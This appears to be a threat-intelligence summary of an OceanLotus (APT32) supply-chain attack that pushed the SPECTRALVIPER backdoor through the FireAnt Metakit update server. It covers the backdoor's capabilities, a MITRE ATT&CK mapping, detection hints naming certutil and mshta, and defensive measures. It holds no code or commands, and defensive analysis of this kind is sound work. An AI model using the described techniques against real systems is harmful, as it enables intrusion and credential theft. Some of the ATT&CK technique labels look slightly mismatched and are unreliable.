How OceanLotus Hijacked Vietnam's Stock App Update Server to Deploy the SPECTRALVIPER Backdoor

Event Overview

ESET identified a supply‑chain poisoning campaign by the OceanLotus (APT32) group. The adversaries compromised the official update server for the Vietnamese stock‑trading app FireAnt Metakit and, over a six‑month window, delivered malicious updates containing the SPECTRALVIPER backdoor to selected investors.

Timeline

Activity began on 2 October 2025, remained undetected, and was publicly recognized in March 2026. A parallel espionage operation against a Vietnamese infrastructure and transportation construction firm ran from mid‑2024 to February 2026, also using SPECTRALVIPER.

Targets

The primary victims were users of FireAnt Metakit who rely on the app for stock investment. Compromise aimed to harvest sensitive financial and transaction data.

Technical Analysis

Attack Method

OceanLotus executed a classic supply‑chain poisoning technique. After gaining access to the FireAnt Metakit update server, the group leveraged the app’s normal update mechanism to push a malicious package embedding the SPECTRALVIPER backdoor. The root cause was the absence of digital‑signature verification for update packages, allowing any entity controlling the server to deliver arbitrary code that the client would execute without validation.

SPECTRALVIPER Capabilities

Remote command execution : Executes arbitrary system commands received from the command‑and‑control server.

Data theft : Harvests credentials from browsers, email clients, FTP clients, and other common applications.

Persistence : Modifies system startup entries or registry Run keys to maintain long‑term foothold.

Covert communication : Uses legitimate web protocols to blend C2 traffic with normal traffic, evading typical firewall rules.

MITRE ATT&CK Mapping

Initial Access – T1195.001 – Supply Chain Poisoning (Compromise Software Updates)

Command & Control – T1071.001 – Application Layer Protocol (Web Protocol)

Exfiltration – T1041 – Exfiltration Over C2 Channel

Persistence – T1547.001 – Registry Run Keys / Startup Folder

Detection Strategies

Network layer : Monitor traffic between update servers and clients, establish baselines, and flag anomalies, including domain‑generation‑algorithm (DGA) communications.

Host layer : Enable process monitoring and command‑line logging; watch for suspicious binary calls such as certutil or mshta, which SPECTRALVIPER frequently uses.

Application layer : Track update frequency and timing for deviations from normal patterns.

Defense Measures

Enforce digital‑signature verification for all software updates and validate signatures before installation.

Secure update channels : Host update servers in hardened network zones with strict access controls and multi‑factor authentication.

Deploy IDS/IPS at the perimeter of update server networks to detect potential compromise.

Prepare a supply‑chain incident response playbook to enable rapid containment and remediation.

Conclusion

The FireAnt Metakit supply‑chain attack shows that compromising a legitimate update mechanism lets adversaries bypass traditional perimeter defenses and deliver a powerful backdoor to high‑value financial targets. Auditing third‑party update mechanisms, enforcing signature verification, and implementing continuous monitoring are essential mitigations.